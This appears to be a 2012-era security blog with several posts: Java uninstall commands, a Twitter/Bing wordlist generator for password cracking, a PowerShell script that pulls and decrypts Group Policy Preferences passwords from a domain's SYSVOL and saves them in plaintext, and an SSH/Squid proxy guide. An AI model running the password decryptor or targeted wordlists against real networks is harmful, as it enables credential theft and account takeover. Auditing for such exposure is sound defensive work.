msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142020} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142030} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142040} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142050} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142060} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142070} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142080} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142090} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142100} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142110} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142120} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142130} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142140} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142150} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142160} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
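To avoid missing product codes in either purge script (Reader above, Java here), an added example that is not the author's: it enumerates the Windows Uninstall registry keys and selects the MSI product codes whose DisplayName looks like Java or Reader/Acrobat, then hands them to msiexec with the same flags the batch files use. The registry paths and name patterns are my assumptions, the sample entries are constructed, and msiexec is only invoked on Windows with --apply.

```python
import re
import subprocess
import sys

# Display-name patterns assumed to cover JRE, JDK and Reader/Acrobat entries
PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"^Java\b", r"^J2SE\b", r"Java Development Kit",
    r"^Adobe Reader", r"^Adobe Acrobat")]
# An MSI product code is a braced GUID; EXE installers use free-form subkeys
GUID_RE = re.compile(r"^\{[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$",
                     re.IGNORECASE)
UNINSTALL_KEYS = (
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    r"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall",
)

# Constructed sample of (subkey name, DisplayName) pairs; the two GUIDs are
# from the batch scripts above, the last one is a deliberately fake filler.
SAMPLE_ENTRIES = [
    ("{26A24AE4-039D-4CA4-87B4-2F83216033FF}", "Java(TM) 6 Update 33"),
    ("{AC76BA86-7AD7-1033-7B44-AA1000000001}", "Adobe Reader X (10.1.0)"),
    ("Mozilla Firefox 15.0 (x86 en-US)", "Mozilla Firefox 15.0 (x86 en-US)"),
    ("{00000000-0000-0000-0000-000000000000}", "Some Other Product"),
]


def select_product_codes(entries, patterns=PATTERNS):
    """Return the sorted, de-duplicated product codes whose subkey is a GUID
    and whose DisplayName matches one of the patterns."""
    codes = set()
    for subkey, name in entries:
        if not GUID_RE.match(subkey):
            continue  # not an MSI product, msiexec /x cannot remove it
        if any(p.search(name or "") for p in patterns):
            codes.add(subkey.upper())
    return sorted(codes)


def read_uninstall_entries():
    """Windows only: yield (subkey, DisplayName) for every Uninstall entry."""
    import winreg
    for path in UNINSTALL_KEYS:
        try:
            root = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path)
        except OSError:
            continue
        with root:
            i = 0
            while True:
                try:
                    sub = winreg.EnumKey(root, i)
                except OSError:
                    break  # no more subkeys
                i += 1
                try:
                    with winreg.OpenKey(root, sub) as k:
                        name = winreg.QueryValueEx(k, "DisplayName")[0]
                except OSError:
                    name = ""
                yield sub, name


def msiexec_args(code, log=r"c:\temp\purge.log"):
    """Same flags as the batch scripts: silent, no reboot, logged."""
    return ["msiexec", "/x", code, "/qn", "/norestart",
            "/log", log, "REBOOT=Suppress"]


if __name__ == "__main__":
    apply = "--apply" in sys.argv
    entries = read_uninstall_entries() if sys.platform == "win32" else SAMPLE_ENTRIES
    for code in select_product_codes(entries):
        cmd = msiexec_args(code)
        print(("running: " if apply else "would run: ") + " ".join(cmd))
        if apply and sys.platform == "win32":
            subprocess.run(cmd, check=False)
```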

Shell Script: Use Twitter and Bing to Generate Wordlists

There are some great wordlists out there for sure… but a targeted wordlist that fits with the subject of the target site/database can prove to be much more effective.  Joshua Dustin posted to his blog recently about this and I thought this was an excellent idea and wanted to take it a little bit further.  This script adds some automation to his idea and also adds a word-grab from Bing as well.  Since it’s a little more modularized in this script it’ll be easy to add other word sources.  I’ll be adding more soon once I have additional time to do so.  Please check out his post for further information on why this type of wordlist generation can be so effective.  He does a great job explaining it.

I have a few other things in the works I had intended on releasing sooner (rather than another post based on someone else’s idea) but those scripts are getting near-daily updates due to the fact that I’m using them constantly.  One just got a roughly 20x speed boost today thanks to some command-line option changes.  Don’t worry, though, they’re worth the wait!  Now, on to the code:

Running this script:

  • Run it using as many keywords as you’d like to scrape off the web:
    • ./wordlistgen.sh your keywords go here

#!/bin/bash
#################################################
# Internet Wordlist Generator by:               #
#      Nathan V                                 #
#      Cyber Security Analyst                   #
#      http://nathanv.com                       #
#                                               #
# For assistance and new versions contact       #
#      nathan.v@gmail.com                       #
# This file updated:               18 July 2012 #
#################################################
# This script (c)2012 Nathan V : License: GPLv3 #
# This is free software, and you are welcome to #
# redistribute it under certain conditions; See #
# http://www.gnu.org/licenses/gpl.html          #
#################################################
# getTweets() is based on twitter.sh by:        #
#      Joshua Dustin                            #
#7habitsofhighlyeffectivehackers.blogspot.com.au#
#################################################

# import arguments
args="$@"

# clear screen and check for input parameter
clear
if [ -z "$1" ]
then
    echo "Missing input parameters.  Please use: $0 keyword1 [keyword2 ...]"
    exit 1
else
  echo ""
fi

# scrape Twitter for tweets containing your keywords
# (note: the search.twitter.com JSON endpoint used here has since been retired by
#  Twitter, so this source returns nothing until the URL and authentication are updated)
getTweets() {
	local key=$1
	echo -n "Grabbing for keyword $key..."
	wget -q "http://search.twitter.com/search.json?q=$key&rpp=500" -O result.json
	# split the JSON on commas, keep the "text" fields, break them into one word per
	# line, then strip HTML entities, punctuation, leading #/@ and URLs before appending
	cat result.json | tr "," \\n | grep "^\"text" | cut -d"\"" -f4- | tr " " \\n | sed -e 's~&amp;~~g' -e 's~&gt;~~g' -e 's~&lt;~~g' | sed 's/["=|?.!():;]//g' | sed 's/^#//' | sed 's/^@//' | sed '/^$/d' | grep -v "^http:" | grep -v '\\' >> wl.temp
	rm -f result.json
	echo " complete."
	sleep .1
}

# scrape Bing for search results related to your keywords
# (note: the api.search.live.com RSS endpoint used here has since been retired)
getBing() {
	local key=$1
	echo -n "Grabbing for keyword $key..."
	wget -q "http://api.search.live.com/rss.aspx?source=web&query=$key" -O result.rss
	# strip HTML entities and (possibly multi-line) tags from the RSS, then split into
	# words and clean them the same way getTweets() does before appending
	cat result.rss | sed -e 's~&amp;~~g' -e 's~&gt;~~g' -e 's~&lt;~~g' | sed -e :a -e 's/<[^>]*>/ /g;/</N;//ba' | tr " " \\n | sed 's/["=|?.!():;]//g' | sed 's/^#//' | sed 's/^@//' | sed '/^$/d' | grep -v "^http:" | grep -v '\\' >> wl.temp
	rm -f result.rss
	echo " complete."
	sleep .1
}

# loop through keywords calling the twitter scrape function
echo "Starting Twitter grabs..."
for word in $args
	do
	getTweets $word
	done
echo ""

# loop through keywords calling the bing scrape function
echo "Starting Bing grabs..."
for word in $args
	do
	getBing $word
	done
echo ""

# sort/unique/clean up results (sort -u already de-duplicates; the second pass
# merges the new words with any existing wordlist.list, then blank lines are dropped)
echo "Sorting wordlist..."
sort -u wl.temp >> wordlist.list
sort -u -o wordlist.list wordlist.list
sed -i '/^$/d' wordlist.list
rm -f wl.temp
echo ""

# this while block allows us to re-scrape using the keywords found in the original grabs.
quit=""
while [ -z "$quit" ]
	do
	listLength=$(wc -l < wordlist.list)
	echo "Wordlist contains $listLength words so far.  We can re-scan"
	echo "using the words in this list to find even more or we can quit."
	echo ""
	echo "Type q to exit or press [ENTER] to re-scan"
	read -n1 quit
	if [ -n "$quit" ]
	then 
		echo ""
		echo ""
		break
	else
		# loop through current results calling the twitter scrape function
		echo "Starting twitter grabs..."

		while read -r word
			do
			getTweets "$word"
			done < wordlist.list
		echo ""

		# loop through current results calling the bing scrape function
		echo "Starting Bing grabs..."
		while read -r word
			do
			getBing "$word"
			done < wordlist.list
		echo ""

		# sort/unique/clean up results once more
		echo "Sorting wordlist..."
		sort -u wl.temp >> wordlist.list
		sort -u -o wordlist.list wordlist.list
		rm -f wl.temp
		echo ""
	fi
	done

rm -f result.json 2> /dev/null
rm -f result.rss 2> /dev/null
listLength=$(wc -l < wordlist.list)
echo "Wordlist complete:  $listLength words."
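The cleanup stage of the script above is the part that tends to get reused, so here it is as a stand-alone, added example that is not from the original script: every word source is a function writing raw text to stdout, extract_words normalises that text into one candidate word per line, and build_wordlist merges any number of sources into a sorted, de-duplicated list. The sample_page function and its HTML are constructed input standing in for a scraped page, and the function names and the MIN_LEN setting are my own; a real source would wrap wget or curl output the way getTweets() and getBing() do.

```shell
#!/bin/bash
# Added example: a modular "word source" pipeline in the spirit of the script
# above (not the original code).  Sources are functions that print raw text;
# extract_words() turns that text into one candidate word per line.

MIN_LEN=${MIN_LEN:-3}   # drop very short tokens (assumed default)

# Normalise raw text from stdin into candidate words:
#   strip HTML tags and entities, split on whitespace, drop URLs, trim
#   surrounding punctuation (which also removes leading # and @), and
#   drop anything shorter than MIN_LEN characters.
# Under the C locale non-ASCII letters count as punctuation, so run with a
# UTF-8 locale if the target site uses accented words.
extract_words() {
    sed -e 's/<[^>]*>/ /g' -e 's/&[a-zA-Z0-9#]*;/ /g' \
    | tr -s '[:space:]' '\n' \
    | grep -Ev '^https?://' \
    | sed -e 's/^[^[:alnum:]]*//' -e 's/[^[:alnum:]]*$//' \
    | grep -E "^.{${MIN_LEN},}$"
}

# A word source: any function that writes raw text to stdout.  This one is
# constructed sample HTML standing in for a scraped page.
sample_page() {
    cat <<'EOF'
<html><body><h1>Welcome to Acme Widgets</h1>
<p>Our flagship product, the <b>WidgetPro&trade;</b>, ships worldwide.
Follow @AcmeWidgets and #WidgetPro for news! See http://example.invalid/news</p>
</body></html>
EOF
}

# A second source kind: raw text from a local file (e.g. a saved About page).
file_source() {
    cat "$1"
}

# Merge any number of sources into one sorted, de-duplicated list on stdout.
# Usage: build_wordlist sample_page "file_source notes.txt" > wordlist.list
build_wordlist() {
    local src
    for src in "$@"; do
        $src | extract_words          # unquoted on purpose: allows "func arg"
    done | sort -u
}
```

Each scraper in the script above can be turned into a source by making it print the fetched text instead of appending to wl.temp; the re-scan loop then becomes a second call to build_wordlist fed with the words from the first pass.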

PShell Script: Extract All GPO Set Passwords From Domain

This script parses the domain’s Policies folder looking for Groups.xml files.  These files contain either a username change, a password setting, or both.  This gives you the raw data for local accounts and/or passwords enforced using Group Policy Preferences.  Microsoft chose to use a static AES key for encrypting this password.  How awesome is that!

The password is encrypted once with AES-256 in CBC mode.  The key used is:

4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

A big thank you to my friend Keith B who helped me with tips for the PowerShell code.  I definitely do not have a background working with PS and learned some cool things along the way.

This script was modified from original work by Chris Campbell as noted in the comments.

Update:  21 Oct 2012:  With feedback from Piet Carpentier (@DFTER) and ‘Joe’ I’ve modified the decryptPassword function to correct an issue where the string was sometimes too long or not returned, which was being reported as a failed decryption rather than as a missing or incorrectly decoded string.  Thanks guys!

Update:  14 Dec 2012:  Reviewed this and found a couple things I could fix or improve on.  The functions return better information and I fixed a bug that caused decryption failures in some cases.

Running this script:

  • Run it against the current domain to find everything:
    • PS C:\> .\GPO-Passwords.ps1
  • Run it against a local copy of a Groups.xml file:
    • PS C:\> .\GPO-Passwords.ps1 -local .\Groups.xml
<#
#################################################
# Group Policy Preferences Password check by:   #
# Nathan V                                      #
# Cyber Security Analyst                        #
# http://nathanv.com                            #
#                                               #
# For assistance and new versions contact       #
# nathan.v@gmail.com                            #
# This file updated: 14 Dec 2012                #
#################################################
# This script (c)2012 Nathan V : License: GPLv2 #
# This is free software, and you are welcome to #
# redistribute it under certain conditions; See #
# http://www.gnu.org/licenses/gpl.html          #
#################################################
# Based on Get-GPPPassword by:                  #
# Chris Campbell                                #
# www.obscuresecurity.blogspot.com              #
# @obscuresec                                   #
#################################################
#>
Param(
    [alias("local")]
    $localfile)

# Import the Group Policy module;  required for finding the GPO name for each password.  If this fails the names will not resolve but other functions will still work.
import-module grouppolicy -ea SilentlyContinue
$results = @()  # declare dynamic results array

# Function to allow us to go to the network DIR and then return back to where we started
function cdir {
    if ($args[0] -eq '-') {
            $pwd=$OLDPWD;
        } else {
            $pwd=$args[0];
        }
        $tmp=pwd;
        if ($pwd) {
            Set-Location $pwd;
        }
    Set-Variable -Name OLDPWD -Value $tmp -Scope global;
}

# Function to pull the encrypted password string from Groups.xml.
# These helpers read $Path (and decryptPassword reads $cPassword) from the calling
# parseDecrypt scope, which PowerShell's dynamic scoping allows.
function parsecPassword {
    try {
        [xml] $Xml = Get-Content ($Path)
        [string] $cPassword = $Xml.Groups.User.Properties.cpassword
    } catch { $cPassword = "No Password Policy Found" }
    return $cPassword
}
# Function to look to see if the administrator account is given a new name
function parseNewName {
    try {
        [xml] $Xml = Get-Content ($Path)
        [string] $newName = $Xml.Groups.User.Properties.newName
        if ($newName) {
            return $newName
        } else {
            return "No Username Specified"
        }
    } catch { return "Error" }
}
# Function to parse out the Username whose password is being specified
function parseUserName {
    try {
        [xml] $Xml = Get-Content ($Path)
        [string] $userName = $Xml.Groups.User.Properties.userName
        if ($userName) {
            return $userName
        } else {
            return "No Username Specified"
        }
    } catch { return "Error" }
}

# Function that decodes and decrypts the password.  GPP strips the trailing '='
# characters from the Base64 value, so the padding is restored here before decoding;
# a length that is already a multiple of 4 needs none (appending "====" makes
# FromBase64String throw, which showed up as "Decryption Failed!").
function decryptPassword {
    try {
        if ( $cPassword.Length -eq 0 ) {
            return "Empty Password!"
        } elseif ( $cPassword.Length -gt 64 ) {
            # guard against over-long strings (kept from the original)
            [string]$cPassword = [string]$cPassword.Substring(0,64)
        }
        [string]$Pad = ""
        $mod = $cPassword.Length % 4
        if ( $mod -ne 0 ) { [string]$Pad = "=" * (4 - $mod) }
        $b64Decoded = [Convert]::FromBase64String($cPassword + $Pad)
        $aesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        # the static AES-256 key listed above
        [Byte[]] $aesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
        $aesIV = New-Object Byte[]($aesObject.IV.Length)   # all-zero IV
        $aesObject.IV = $aesIV
        $aesObject.Key = $aesKey
        $decryptorObject = $aesObject.CreateDecryptor()
        [Byte[]] $outBlock = $decryptorObject.TransformFinalBlock($b64Decoded, 0, $b64Decoded.Length)
        # the plaintext is UTF-16LE
        return [System.Text.Encoding]::Unicode.GetString($outBlock)
    } catch { return "Decryption Failed!" }
}

# Function to find the policy name to locate where the password is valid
function getGPO {
    $guid = $Path.Substring(1,36)
    try {
        $gpoName = get-gpo -guid $guid | Select-Object -ExpandProperty DisplayName
    } catch {
        $gpoName = "Unable to find GPO name"
    }
    return $gpoName
}

# Function to parse the XML, decrypt the key, and return the results.
function parseDecrypt($path) {
    $cPassword = parsecPassword
    $password = decryptPassword
    $newName = parseNewName
    $userName = parseUserName
    if ($localfile -eq $null) {$gpo = getGPO} else {$gpo = "Local file"}
    $results = "$username, $newName, $password, $gpo"
    return $results
}
Clear-Host
if ($localfile -eq $null) {
    Write-Host "Searching $Env:UserDNSDomain for Group Policy Preferences passwords."
    Write-Host "On a large domain this may take some time. Please wait..."
    $sourceXML = Get-ChildItem -Path "\\$Env:UserDNSDomain\SYSVOL\$Env:UserDNSDomain\Policies" -Recurse -Name -Include Groups.xml
    # Due to the potential length of the filenames given a long domain name we CD to the Policies folder to shrink it down
    cdir \\$Env:UserDNSDomain\SYSVOL\$Env:UserDNSDomain\Policies\
} else {
    Write-Host "-local used; checking file $localfile"
    $sourceXML = $localfile
}

Write-Host " "
Write-Host "Username, New name (if any), Password, source GPO:"
Write-Host " "

foreach ($file in $sourceXML) {
    $results += parseDecrypt $file
}
if ($localfile -eq $null) { cdir - }
"Username, New name (if any), Password, source GPO:" > ".\domain_passwords.txt"
foreach ($result in $results) {
    Write-Host $result
    $result >> ".\domain_passwords.txt"
}
Write-Host " "
Write-Host "List of discovered settings saved as .\domain_passwords.txt"
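An audit-oriented version of the parse step, as an added example in shell that is not part of the post’s script: it lists the stored cpassword values in a GPP XML file, restores the Base64 padding that the 21 Oct and 14 Dec updates above deal with, and prints one report line per stored password. The Groups.xml content, the CLSID/UID placeholders and the cpassword value are constructed (the value is the Base64 of a plain ASCII string rather than a GPP ciphertext, so the padding logic can be checked without AES), and the function names are my own.

```shell
#!/bin/bash
# Added example (not part of the original script): audit a Group Policy
# Preferences XML file for stored cpassword values and restore the Base64
# padding that GPP strips.  The XML and the cpassword value below are
# constructed; the value is the Base64 of an ASCII string, not a real
# GPP ciphertext, so it exercises the padding logic without AES.

# Print every cpassword attribute value in a GPP XML file, one per line.
# The same attribute can appear in Groups.xml, Services.xml,
# ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml.
find_cpasswords() {
    grep -o 'cpassword="[^"]*"' "$1" | sed -e 's/^cpassword="//' -e 's/"$//'
}

# GPP writes the Base64 without its trailing '=' characters.  Add them back
# so a standard decoder accepts the string; a length that is already a
# multiple of 4 must get none (appending "====" is the failure behind the
# script's padding fix).
restore_b64_padding() {
    local s="$1"
    while [ $(( ${#s} % 4 )) -ne 0 ]; do
        s="$s="
    done
    printf '%s\n' "$s"
}

# One report line per stored password: which account, and from which GPO.
# The GPO GUID is the {...} path component under Policies, as getGPO() uses;
# a plain file path without one reports "unknown".
audit_gpp_file() {
    local f="$1" cp padded user guid
    user=$(grep -o 'userName="[^"]*"' "$f" | head -n 1 | sed -e 's/^userName="//' -e 's/"$//')
    guid=$(printf '%s\n' "$f" | grep -o '{[0-9A-Fa-f-]\{36\}}' | head -n 1)
    for cp in $(find_cpasswords "$f"); do
        padded=$(restore_b64_padding "$cp")
        printf 'GPO %s: account "%s" has a GPP cpassword (%d chars, %d with padding)\n' \
            "${guid:-unknown}" "${user:-?}" "${#cp}" "${#padded}"
    done
}

# Constructed Groups.xml in the GPP layout; prints the temp file's path.
write_sample_groups_xml() {
    local f
    f=$(mktemp)
    cat >"$f" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CONSTRUCTED-CLSID}">
  <User clsid="{CONSTRUCTED-CLSID}" name="Administrator (built-in)" image="2" changed="2012-12-14 10:00:00" uid="{CONSTRUCTED-UID}">
    <Properties action="U" newName="localadm" fullName="" description="" cpassword="QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
</Groups>
EOF
    printf '%s\n' "$f"
}
```

Run audit_gpp_file against each Groups.xml (and the other file types named in the comment) found under the domain’s SYSVOL Policies share; decryption itself is what the PowerShell above does. Microsoft removed the ability to write new cpassword values with MS14-025 in 2014, but preference items created before that stay in SYSVOL until they are deleted, which is why the audit is still worth running.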

Secure Browsing From Anywhere

Do you trust the wifi you’re using at Starbucks?  Maybe that hardline at the hotel is sketchy.  You never know who is on the network with you and what their skills and motivations might be.  Why share anything with them if you don’t have to?  The sections below cover setting up a secure proxy server that you control, so you can surf the internet on even the most questionable connections without worrying about eavesdroppers and MITM attacks.  We’ll set up a linux server, SSH with key-based authentication, and then start browsing through an encrypted tunnel.  Your SSHD options may dictate another setting but typically this tunnel will be secured with AES-256, which is a secure and fast cipher.  AES-256 is also used by other encrypted storage and communication systems such as BitLocker, IronKey devices, and SSL.

This does assume that you have some technical background already but I tried to make things pretty easy.  If there are any questions please add them in the comments and I can try to answer there or add them into the post.

The first section below covers the setup and initial configuration of the proxy server.  In this example we’re using a linux server and the Squid proxy.  Linux natively supports SSH for the encrypted tunnel and Squid is an excellent open-source proxy solution that also provides web caching.  You can set up a similar solution using SSH via a Windows server but it requires a more involved setup process as SSH isn’t natively a part of the Windows OS.

The second section describes the client setup and use from either linux or Windows.  The linux instructions should work for Mac users as well.  Once the proxy is up and online using it from your client system is easy and straightforward.

The third section is optional as it’s additional configuration that doesn’t have a major technical effect, since we’ve already encrypted everything, but what it does is prevent the sites you’re visiting from knowing you’re even using a proxy.  The possible implication of that is altered behavior of the site due to your IP being identified as coming from another nation or similar.  For example, some sites limit your access based on your location because of copyright reasons. While this is not meant to be an assist to violating copyrights, that ability is there.  The goal for me in this was being able to get US internet while abroad.  I can’t watch Netflix movies from Europe on my US Netflix account but it works well when I pass my traffic via my transparent US proxy server.

In the last section I’ll address an additional configuration option for Firefox that will also prevent information leakage via your DNS requests.  What the setting does is tell Firefox to forward DNS requests to the proxy server to answer rather than querying the DNS server your client system is pointed to.  This means that if an attacker is listening on the wire they are unable to see what sites you’re browsing based on your DNS queries.

If you don’t have a handy dandy home linux server like I do then you’ll want to get one set up or use a cloud provider.  Amazon Web Services provides an intro tier that gives you enough free utilization to run a small linux server for a year and a fair amount of bandwidth along with several other services.  You can sign up for this at https://aws.amazon.com/free  Just keep an eye on your bandwidth usage and you can use it 100% free.  It’s cheap after you get out of the free tier but keep in mind it does cost money if you use more than the allotted free amount.  Beyond that there are other options (all paid) by using Linode, Rackspace, or others.  There’s no option for a linux server with Azure (yet?) so don’t try there unless you want to try to set this up on Windows.

 

Note:  These instructions assume that they are run as an administrative user such as root.  If you will be using a non-administrative user with sudo rights just keep in mind most of these commands require sudo first.  Also, note that the instructions below are based on completing this on Ubuntu, Arch, or Fedora.  The packages specific to your system may vary slightly if you’re using another distribution.  You can check the online references or package lists to verify which package is right for you.

 

Part 1: Server Setup (Linux)

1. Make sure your server’s firewall is secure. You’re going to be installing a proxy server and you don’t want the world trying to use it. How you choose to do this is up to you but IPTables is a solid option.  Make sure, however, that you are careful with the rules or your own connections will be blocked as well.  If there’s interest I’ll add an IPTables how-to onto here as well.  If you are using an AWS VM the default setting is very secure as it doesn’t allow anything through you haven’t already specified.  If you haven’t done so already make sure the server is up to date as well.  Example: apt-get update && apt-get upgrade, or yum update, or pacman -Syu

2. Install SSH if not already present. Example: apt-get install openssh-server or yum install openssh-server or pacman -S openssh

3. Set up SSHD. You can find the config usually in /etc/ssh/sshd_config.  Example:  nano /etc/ssh/sshd_config
— a. Set port to something high and/or unusual like 45454
— b. Disable password authentication.
— c. Disable remote root login
— d. Enable logging to SYSLOG for all AUTH if not already enabled
— e. Ensure public key (RSA) logins are enabled and use .ssh/authorized_keys or another location of your preference.  Here I will assume .ssh/authorized_keys

4. Create a new user on the system. I recommend using -m to create the home directory in advance.  If you’d like to be able to use this account for administrative functions you can also use -G to specify the group the user should belong to.  For Ubuntu you would use the second example provided (with sudo as the group, since Ubuntu uses sudo rather than wheel).  Example:  useradd -m newuser  Example 2:  useradd -m -G wheel newuser

5. Use ssh-keygen to generate an SSH key pair for this user. I recommend using -b 4096 -t rsa for a 4096-bit RSA key.  Example:  ssh-keygen -b 4096 -t rsa

6. Copy the public key into the user’s authorized_keys file. Create the file and folder if needed. Example: cat newuserkey.pub > /home/newuser/.ssh/authorized_keys

7. Use chmod to change the permissions of the file to 0600 so it is accepted by SSHD.  Example: chmod 0600 /home/newuser/.ssh/authorized_keys  Also make sure the .ssh directory itself is 0700 and that both it and the file are owned by newuser (for example chown -R newuser: /home/newuser/.ssh); with StrictModes on, which is the default, SSHD ignores key files that other users could write to.

8. Copy the private key to the system you’ll be connecting from.  Make sure you name it something obvious so you’ll be able to find it again.  Example:  newuserkey.pem

9. Start/restart SSHD. If SSHD is running use /etc/rc.d/sshd restart or /etc/init.d/sshd start or service sshd restart. Which works will depend on your distro.  If not running use start instead of restart.

10. From the other system use PuTTy or SSH to test the connection and make sure it works and the key works. If you’re not familiar with this process use the instructions in Part 2.  Example: ssh -i newuserkey.pem newuser@server -p 45454

11. Once SSHD is verified go back to the server and install Squid. Example: yum install squid or apt-get install squid or pacman -S squid

12. The Squid default config will be fine for our purposes but you can harden it by editing /etc/squid/squid.conf or wherever you installed to.  One change worth making regardless is to have Squid listen only on the loopback interface (http_port 127.0.0.1:3128 instead of the default http_port 3128): the SSH tunnel in Part 2 connects to localhost, and nothing else should be able to reach the proxy.

13. Start Squid. Example: /etc/rc.d/squid start or /etc/init.d/squid start or service squid start

14. Use chkconfig to verify the services for Squid and SSH start automatically.  Run chkconfig --list to see the current settings.
•  a. If one or both of the services aren’t set to on at any run level you can fix that also using chkconfig.
•  b. To start Squid automatically use the first example.  The second is for SSHD.  Example:  chkconfig --level 2345 squid on  Example 2:  chkconfig --level 2345 sshd on

15. Validate that the firewall between this system and the internet allows incoming connections on the port you chose.
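Before restarting SSHD in step 9 it is worth checking that the settings from step 3 actually took effect, remembering that sshd uses the first occurrence of a keyword and ignores later duplicates, so a distribution default left above your new line silently wins. The checker below is an added example, not part of the post: the two sample configs, the temp-file helper and the function names are my own, and it reads only the global section of the file (everything before the first Match block).

```shell
#!/bin/bash
# Added example (not from the post): audit an sshd_config against the Part 1,
# step 3 settings before restarting SSHD.  The two configs are constructed.

lc() { printf '%s' "$1" | tr '[:upper:]' '[:lower:]'; }

# Effective value of a keyword in the global section of an sshd_config.
# sshd takes the FIRST occurrence of each keyword, so a leftover line above
# your edit wins; everything after the first Match block is conditional and
# is ignored here.  Accepts "Keyword value" and "Keyword=value".
sshd_value() {
    awk -v k="$2" '
        { sub(/^[ \t]+/, ""); n = split($0, a, "[ \t=]+") }
        n == 0 || a[1] ~ /^#/ { next }
        tolower(a[1]) == "match"     { exit }
        tolower(a[1]) == tolower(k)  { print a[2]; exit }
    ' "$1"
}

# Print one FAIL/WARN line per problem; silent when the config matches step 3.
check_sshd_config() {
    local f="$1" v
    v=$(sshd_value "$f" PasswordAuthentication)
    [ "$(lc "${v:-yes}")" = no ] \
        || echo "FAIL: PasswordAuthentication is '${v:-unset, default yes}' (step 3b wants no)"
    v=$(sshd_value "$f" ChallengeResponseAuthentication)
    [ "$(lc "${v:-yes}")" = no ] \
        || echo "FAIL: ChallengeResponseAuthentication is '${v:-unset, default yes}' (PAM can still prompt for a password)"
    v=$(sshd_value "$f" PermitRootLogin)
    [ "$(lc "$v")" = no ] \
        || echo "FAIL: PermitRootLogin is '${v:-unset}' (step 3c wants no)"
    v=$(sshd_value "$f" PubkeyAuthentication)
    [ "$(lc "${v:-yes}")" = yes ] \
        || echo "FAIL: PubkeyAuthentication is '$v' (step 3e: key logins must stay enabled)"
    v=$(sshd_value "$f" LogLevel)
    case "$(lc "${v:-info}")" in
        quiet|fatal|error) echo "WARN: LogLevel '$v' hides authentication events (step 3d)" ;;
    esac
    v=$(sshd_value "$f" Port)
    { [ -n "$v" ] && [ "$v" != 22 ]; } \
        || echo "WARN: Port is '${v:-22}' (step 3a suggests a high, unusual port)"
}

# Constructed sshd_config samples; prints the temp file's path.
write_sample_sshd_config() {   # $1 = weak | hardened
    local f
    f=$(mktemp)
    if [ "$1" = weak ]; then
        cat >"$f" <<'EOF'
# distribution defaults left in place
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
# the edit from step 3b, but sshd already took the line above
PasswordAuthentication no
EOF
    else
        cat >"$f" <<'EOF'
Port 45454
Protocol 2
PermitRootLogin no
PasswordAuthentication no
ChallengeResponseAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
SyslogFacility AUTH
LogLevel INFO
EOF
    fi
    printf '%s\n' "$f"
}
```

On the server, run check_sshd_config /etc/ssh/sshd_config and fix every FAIL before step 9; the ChallengeResponseAuthentication check is there because turning off PasswordAuthentication alone still lets PAM offer a keyboard-interactive password prompt on many distributions.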

 

Part 2: Using your new RSA encrypted secure proxy

Part 2a: Linux Client system

1. From a remote site verify you have internet connectivity.

2. Verify that SSH back to your server is working. Example: ssh -i newuserkey.pem newuser@server -p 45454

3. Disconnect and reconnect with tunneling enabled targeting the Squid port. Example: ssh -i newuserkey.pem -L 8080:localhost:3128 newuser@server -p 45454

4. Open your browser and change the proxy setting to 127.0.0.1:8080.  In Firefox this is in Options -> Advanced -> Network -> Settings

5. Attempt to open a web site. You should be able to browse like normal.

6. Congrats! You are now browsing inside an encrypted tunnel!

Part 2b: Windows Client Cygwin Method

1. From a remote site verify you have internet connectivity.

2. Install Cygwin from  http://www.cygwin.com/install.html

3. Open the Cygwin terminal and verify that SSH back to your server is working. Example:  ssh -i newuserkey.pem newuser@server -p 45454

4. If that succeeds disconnect (just type exit) and reconnect with tunneling enabled targeting the Squid port.  Example:  ssh -i newuserkey.pem -L 8080:localhost:3128 newuser@server -p 45454

